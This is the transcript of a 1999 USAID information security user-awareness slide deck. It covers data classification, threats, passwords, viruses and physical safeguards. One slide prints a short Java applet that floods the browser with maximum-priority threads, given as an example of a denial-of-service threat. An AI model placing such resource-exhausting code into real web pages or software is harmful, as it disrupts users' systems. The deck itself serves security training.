information security user awareness training 1999 by bill cleveland
Post on 18-Dec-2015
214 views
TRANSCRIPT
![Page 1: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/1.jpg)
Information Security
USER AWARENESS TRAINING
1999
by Bill Cleveland
![Page 2: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/2.jpg)
INFORMATION SECURITY STAFFUSAID Information Systems Security Officer Jim Craft <[email protected]> (202) 712-4559
Senior Security Consultants: Mike Fuksa <[email protected]> (202) 712-1096 Ante Penaso <[email protected]>(703) 465-7008
Security Training and Awareness Consultant
Bill Cleveland <[email protected]>
(703) 465-7054
![Page 3: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/3.jpg)
BRIEFING OBJECTIVESAIS SECURITY
Why is it important? What is Automated Information
Security / Computer Security? Current Issues (Threats/Vulnerabilities/
Countermeasures) Contingency Planning Conclusion Open Discussion
![Page 4: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/4.jpg)
Information Security
Why is it important?
![Page 5: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/5.jpg)
COMPUTER SECURITY
Definition - Measures required to protect against unauthorized (accidental or intentional) disclosure, modification or destruction of Automated Information System, networks and computer resources or denial of service to process data.
![Page 6: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/6.jpg)
We are a computerized society Nearly everything we do
utilizes computers How much data do you
maintain that isn’t contained on a computer somewhere?
All computers are vulnerable
NUMBER ONE
![Page 7: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/7.jpg)
NUMBER TWO
Much of what we compromise is done through unclassified open source publications, conventions, consortiums, patents, etc.
All this tied together provides a pretty complete paint-by-the-numbers picture.
![Page 8: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/8.jpg)
IN THE PAST FEW COMPUTERS WERE
AVAILABLE, AND ONLY SPECIALISTS COULD USE THEM
![Page 9: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/9.jpg)
TODAY, COMPUTERS ARE COMMON EQUIPMENT, AND (ALMOST) ANYONE CAN USE
THEM...
![Page 10: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/10.jpg)
HEADLINESECURITY STORIES
Security Breaches UpDramatically on Milnet
By Florence Gore Army, Navy, Air Force and Defense Department
Youths charged in
computer plot
CHICAGO- Two high school ju
n-
iors from suburban Palatin
e have
6,000
Computer
Securit
y Brea
ches
Detaile
d in A
gricultu
re Dep
t. Rep
ort
by Robert
Pear
Washington Star
Staff W
riter
Agricultu
re Dep
artmen
t pro
cedures
and data
files
contai
ning
large a
mounts of s
ensit
ive in
formati
on, inclu
ding the n
ames
of
persons w
ho rece
ived gove
rnmen
t chec
ks w
ere brea
ched
to th
e
Marines Faulted Over Care of Secrets
By Neil Roland
United Press International
Sensitive unclassified and classified material could go undetected,
auditors found. Auditors did not say they had found instances of
espionage. But the report said Marine Corps personnel sometimes
granted civilian contractors access to classified documents even
though the civilians needed security clearances. Maj Ron Stokes, a
Peace Activist Found Guiltyof Wrecking DoD Computer
By Eric FredellSpecial to GCN
Some computers just ask for a good whacking. In June at Vandenburg Air Force Base in California a peace activist was found destroying a computer. She gave it a right with a
![Page 11: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/11.jpg)
Security becomes more and more work, as
we all are learning.....
![Page 12: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/12.jpg)
WHAT IS AIS SECURITY / COMPUTER SECURITY?
![Page 13: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/13.jpg)
AIS Security
Provides a reasonable level of protection against destruction or partial destruction of your computer systems that could result in partial or total denial of services to the system users.
The Protection of data and software from unauthorized access.
![Page 14: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/14.jpg)
AIS SECURITY PERTAINS TO -
Physical Personnel Hardware Software Communications Emanations Administrative/Operations Data/Information
![Page 15: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/15.jpg)
PHYSICAL SECURITY
Physical security is that part of security concerned with physical measures designed to safeguard personnel, to prevent unauthorized access to equipment, installations, material, and documents, and theft. Physical security and AIS security go hand in hand.
![Page 16: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/16.jpg)
AIS SECURITY IS COMPLEX
INFOSEC
TEMPEST
COMSEC
ADMIN
PHYSICAL
AISSECURITY
HARDWARE
SOFTWARE
PERSONNEL
![Page 17: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/17.jpg)
IS SYSTEM =
HARDWARE
+
FACILITIES
+
+
PEOPLE
SOFTWARE / DATA
![Page 18: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/18.jpg)
WHY INFORMATION SECURITY?
Mission Cost Data/Software Dependence
SS
![Page 19: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/19.jpg)
WHY -
Two Reasons:It makes senseIt’s the law
![Page 20: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/20.jpg)
COMPUTER SECURITY ISEVERYONE’S RESPONSIBILITYCooperation and support from all personnel throughout the activity is an essential key to a successful program!
End User Supervisors
New Employees
End Users
![Page 21: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/21.jpg)
DATA CLASSIFICATIONS
CLASSIFIED (CONFIDENTIAL, SECRET, TOP SECRET)
SENSITIVE BUT UNCLASSIFIED (TECHNICAL, PROPRIETARY, PROGRAM
SPECIFIC)
UNCLASSIFIED
![Page 22: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/22.jpg)
DATA CLASSIFICATIONCLASSIFIED
Confidential - Secret - Top Secret To Access Classified Material -
- Appropriate Clearance Level
- Need-to-Know
- Access Approval Special Handling and Storage Requirements
- Magnetic media may not be shredded, only burned or degaussed by an approved
degausser (TS may only be destroyed)
![Page 23: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/23.jpg)
CLASSIFIED PROCESSING
Unless your computer has been certified by NSA as meeting the trusted computer base criteria for B2 certification (secure multi-level mode), as soon as you introduce classified data into your system, all data on all media and devices associated with the system is classified at the highest level of data contained on the system.
The system and all of its data (100%), remains classified at that level until the system has been sanitized (declassified) by use of approved methods.
![Page 24: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/24.jpg)
DATA CLASSIFICATIONSENSITIVE BUT UNCLASSIFIED
Sensitive
Unclassified
Includes:
- For Official Use Only (FOUO)
![Page 25: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/25.jpg)
Sensitive
Unclassified
DATA CLASSIFICATIONSENSITIVE BUT UNCLASSIFIED
Includes:
- For Official Use Only (FOUO)
- Privacy Act Information
![Page 26: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/26.jpg)
Sensitive
Unclassified
Includes:
- For Official Use Only (FOUO)
- Privacy Act Information
- Contract Information
DATA CLASSIFICATIONSENSITIVE BUT UNCLASSIFIED
![Page 27: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/27.jpg)
Sensitive
Unclassified
Includes:
- For Official Use Only (FOUO)
- Privacy Act Information
- Contract Information
- Technical Information
DATA CLASSIFICATIONSENSITIVE BUT UNCLASSIFIED
![Page 28: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/28.jpg)
Sensitive
Unclassified
Includes:
- For Official Use Only (FOUO)
- Privacy Act Information
- Contract Information
- Technical Information
- Budget Information
DATA CLASSIFICATIONSENSITIVE BUT UNCLASSIFIED
![Page 29: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/29.jpg)
Sensitive
Unclassified
Includes:
- For Official Use Only (FOUO)
- Privacy Act Information
- Contract Information
- Technical Information
- Budget Information
- Financial / Payroll Information
DATA CLASSIFICATIONSENSITIVE BUT UNCLASSIFIED
![Page 30: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/30.jpg)
Includes:
- For Official Use Only (FOUO)
- Privacy Act Information
- Contract Information
- Technical Information
- Budget Information
- Financial / Payroll Information
- Proprietary Information
Sensitive
Unclassified
DATA CLASSIFICATIONSENSITIVE BUT UNCLASSIFIED
![Page 31: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/31.jpg)
Requires Special Handling, Storage and Destruction
DATA CLASSIFICATIONSENSITIVE BUT UNCLASSIFIED (Cont.)
![Page 32: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/32.jpg)
DATA CLASSIFICATIONSENSITIVE BUT UNCLASSIFIED (Cont.)
Requires Special Handling, Storage and Destruction If kept on desk, turn over or store in
desk, file cabinet or notebook
![Page 33: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/33.jpg)
Requires Special Handling, Storage and Destruction If kept on desk, turn over or store in
desk, file cabinet or notebook Destruction must be done in such a way to
prevent reconstruction.
DATA CLASSIFICATIONSENSITIVE BUT UNCLASSIFIED (Cont.)
![Page 34: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/34.jpg)
DATA CLASSIFICATIONSENSITIVE BUT UNCLASSIFIED (Cont.)
Requires Special Handling, Storage and Destruction If kept on desk, turn over or store in
desk, file cabinet or notebook Destruction must be done in such a way to
prevent reconstruction.
![Page 35: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/35.jpg)
Requires Special Handling, Storage and Destruction If kept on desk, turn over or store in
desk, file cabinet or notebook Destruction must be done in such a way to
prevent reconstruction.
OOPS,
DROPSIES
DATA CLASSIFICATIONSENSITIVE BUT UNCLASSIFIED (Cont.)
![Page 36: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/36.jpg)
CURRENT ISSUES
THREATS / VULNERABILITIES /
COUNTERMEASURES
![Page 37: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/37.jpg)
THREATS An activity, deliberate or
unintentional, with the potential for causing harm to an Automated Information System
Manifestation of a threat results in degraded mission accomplishment
Threat identification includes both known threats and reliably postulated threats. Lack of evidence does not rule out the existence of a threat
![Page 38: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/38.jpg)
CATEGORIES OF THREATS
NATURAL - Hurricane, Fire, Flood, Earthquake
Man-Made - Intentional Viruses, Espionage, Sharing Passwords, Inadequate Backups
Unintentional - Accidental Power loss, Forgetting Password, Unattended Terminal Display, Food/Drinks
![Page 39: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/39.jpg)
SOME AIS SECURITY THREATS
Fire Flood / Water Damage Wind Damage Snow / Ice Storms Power Loss Unauthorized Access Espionage Food / Drinks
![Page 40: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/40.jpg)
Sabotage Unauthorized Software / Data
Modification System / Application Programmer
Errors Operator/User Errors and Omissions Communications Failure Fraud and Abuse
SOME AIS SECURITY THREATS
![Page 41: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/41.jpg)
JAVA Issues
Denial of service
![Page 42: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/42.jpg)
import java.applet.*;
import java.awt.*;
public class InfiniteThreads extends Applet implements Runnable
{
Thread wasteResources = null;
boolean StopThreads = false;
public void run ()
{
while (!StopThreads)
{
wasteResources = new Thread(this);
wasteResources.setPriority(Thread.MAX_Priority);
wasteResources.run();
}
}
}
![Page 43: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/43.jpg)
Web Spoofing
Easy to do Spectacular
effect Impossible to
prevent Pre-warned is
Pre-armed!!!!!
![Page 44: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/44.jpg)
E-mail Spoofing
Forge a false e-mail Easy to do Impossible to
prevent Authenticate Sign internal
messages
![Page 45: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/45.jpg)
Social Engineering
Easy to do Easy to prevent Don’t share
passwords
Userid: mreiter
password: mreiter
Share my System!
WRONG!
![Page 46: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/46.jpg)
COMPUTER VIOLATIONS, FRAUD, AND ABUSE
70 - 80% of annual loss related to computers is committed by employees
20% of the total computer-related loss is committed by disgruntled employees
60% of the total computer-related loss is caused through human errors or accidents
have been destroyed by negligence
Disgruntledemployeesabotagesclassified
15 Computers
FLASH
AIS Systems
No one here would ever do that!Would they?
![Page 47: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/47.jpg)
THREATSIMPACTS ON COMPUTER RESOURCES
Destruction Modification Disclosure Denial of Service
How will I ever get
my work done now
!!!!!!
![Page 48: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/48.jpg)
THREAT - VIRUS
Virus - run antivirus programs on a regular basis.
Do not use any outside floppies/ disks on your system without running a virus scan first. Many viruses are introduced because virus scanning was not performed.
No illegal duplication of S/W rule - this reduces the spread of virus and avoids legal headaches
DR. NEAT GAMESCAN
![Page 49: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/49.jpg)
VULNERABILITY
A vulnerability is a flaw or weakness that may be exploited by a threat agent to cause harm to an AIS system or network.
![Page 50: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/50.jpg)
SOME VULNERABILITIES
Open Building / Room Policy Disgruntled Employees Lack of Security Awareness Inadequate Supervision Software / Hardware
![Page 51: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/51.jpg)
THREAT / VULNERABILITY
Data Alteration, Outside Access - This is why audit trails are so important. Checks data processing against tasking and logged computer time for suspicious discrepancies.
In the case where Laptops/portables are used by multiple users, keep a written log of who checked it out and when it was returned.
Toshiba, LaptopMINOR 109999
NAME DATE
![Page 52: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/52.jpg)
THREAT / VULNERABILITY RELATIONSHIP
Sabotage (Threat)
Possible Vulnerabilities Disgruntled Employee(s) Activists / Protesters Inadequate Building Access
Control
Hey man,this base is
great! Not too many guards and the shoreline and many buildingsare open. Thisplace is easy!
Alert our protestgroup, wereon tonight.
![Page 53: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/53.jpg)
SAFEGUARDS / COUNTERMEASURES
Any action, device, procedure, technique or other measure that reduces the vulnerability of a system.
Examples:
Security Operating Procedures
Fire/Smoke Alarms
Intrusion Detection System
Firewall
Awareness Training
![Page 54: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/54.jpg)
IN CONCLUSION
I John Walker
have received my
annual Security
Briefing
SECURITY
BRIEFING
![Page 55: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/55.jpg)
COMMON STATEMENTS #1
Aw come on,
It’s only a
Personal
Computer
![Page 56: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/56.jpg)
But It Still Requires Safeguarding
Many have more capacity and capabilities than some of the mainframes in our inventory.
The only small features are their physical size, the cost, and their security features.
It’s-Only-a-Personal-ComputerFacts
![Page 57: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/57.jpg)
WE
HAVE
TO
TRUST
OUR
PEOPLE...
COMMON STATEMENTS #2
Hi, I downloaded those programs from my PC like you wanted. I’m at my car getting ready to drive over now. See you soon.
I see a computer,,tell me the password so I can check it for you
![Page 58: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/58.jpg)
WE HAVE TO TRUST OUR PEOPLE We like to think we can - but always remember to check on and report suspicious activities
Be on the lookout for people who you do not recognize in your environment.
If you see persons without badges, challenge them.
If you hear someone talking about things they shouldn’t be, let them know. If they continue, report it.
![Page 59: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/59.jpg)
COMMON STATEMENT#3
We
Only
Process
Unclassified
On Our PC’s.....
![Page 60: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/60.jpg)
WE ONLY PROCESS UNCLASSIFIED ON OUR PC’s....
However if it’s private information, it is considered SENSITIVE BUT UNCLASSIFIED and must be treated as such.
If your system is accreditated for Unclassified, that is all that your allowed to process. You must be accreditated for classified processing in order to use your computer for classified work.
Software
Trouble
Report
![Page 61: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/61.jpg)
OPEN DISCUSSION
![Page 62: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/62.jpg)
Yeah, it really got to him!
![Page 63: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/63.jpg)
SECURITY POP QUIZ
![Page 64: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/64.jpg)
WHAT’S WRONG HERE?
BE
![Page 65: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/65.jpg)
WHAT’S THE PROBLEM HERE??
P3D4Oh$
![Page 66: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/66.jpg)
PASSWORD DON’TS:
DO NOT USE ANY PERSONAL NAMES, NICKNAMES, PLACES, BIRTHDAYS, ETC FOR YOUR PASSWORD.
DO NOT USE ANYTHING THAT CAN BE TRACED BACK TO YOU (E.G. AUTO LICENSE NUMBER, BANK ACCOUNT NUMBERS, ANNIVERSARY DATE).
DO NOT USE ANYTHING THAT HAS TO DO WITH YOUR PROFESSION (E.G. JOB TITLE, DEGREE, ETC.).
DO NOT USE THE SAME PASSWORD FOR ALL SYSTEMS.
PASSWORD DO’S:
USE CHARACTERS WITH NUMBERS AND PUNCTUATION.
INTERSPERCE CAPITALS WITH LOWER CASE (EX: Aih4B/3).
DO USE, IF POSSIBLE, AT LEAST SEVEN CHARACTERS IN YOUR PASSWORD.
DO CHANGE YOUR PASSWORD REGULARLY.
**REMEMBER - IF YOU SUSPECT YOUR PASSWORD HAS BEEN COMPROMISED - REPORT IT IMMEDIATELY TO A SYSTEM
ADMINISTRATOR.
![Page 67: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/67.jpg)
SODA
SODA
WHAT’S WRONG HERE?
VisitorEscort Req’d
![Page 68: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/68.jpg)
Protect Your Equipment
You should always try and protect your equipment from situations that can cause damage, i.e. extreme heat, smoke, a leaky roof, etc.
Do not drink or eat around your equipment. Many keyboards have had to be replaced due to drinks being spilled. (If a computer system is on your desk, please keep any food or drink away from it.)
When working on classified, protect your screen from unauthorized viewing.
Prevention from virus. Install and run an anti-virus program often. Do not use any “foreign” magnetic media without running a virus scan on it first.
![Page 69: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/69.jpg)
WHAT’S WRONG HERE?Check out the neat software I brought in. My friend gave it to me. He got it at work. He said it hasn’t got a virus on it, so we don’t need to scan it.
COOL, LETS RUN
IT!
![Page 70: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/70.jpg)
When downloading files from the Internet for use in official business, there are legal considerations, as well as concern such as the introduction of viruses, bugs or other ill effects.
Registration cannot be required with the understanding that it may be used for commercial purposes. In particular, the Government may not be later identified as a user of the s/w or otherwise presented as endorsing the program.
S/W download must not obligate the Government to provide anything in return. In the case of beta software, there cannot be any requirement for the Government to submit an evaluation report in return for the download.
Registration cannot be required with any expectation that the Government may later be obligated to purchase a copy of the s/w.
Finally, where registration causes terms for nondisclosure and use of the s/w, the downloader must take care not to breach any of its
Copyrighted, Licensed or Proprietary Information/Downloading Files:
![Page 71: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/71.jpg)
terms. (For example - in situations where a program is found to be beneficial, the s/w may not be simply duplicated and distributed to others if registration is required from each individual user. On the other hand, if a program is found not to be of use, the downloader must take appropriate steps to remove and/or destroy the s/w.
All users who download files for PC access, should have a virus scan run prior to usage.
Remember to run a virus scan on disks and floppies received from outside our Department. Many virus’ have been passed from Department to Department, because no-one ran a virus-scan. If you need assistance contact the ISSO, or Asst. ISSO.
And don’t forget that use of LANs to domains outside is for Official Business Only. This is a monitored service, and any misuse is subject to disciplinary action or loss of access.
Copyrighted, Licensed or Proprietary Information/ Downloading Files: (CONTINUED)
![Page 72: Information Security USER AWARENESS TRAINING 1999 by Bill Cleveland](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649d255503460f949fc024/html5/thumbnails/72.jpg)
F I N I T OIt’s Over
Fertig(Please go back to work now. No running please, single file, no pushing or shoving. Yes, you may hold hands with the one behind you. Don’t try to be the first one out if it requires pushing someone else out of your way. Take nothing but the knowledge with you, leave nothing but empty seats. Thank you very much. That’s all I can say, so have a nice day.)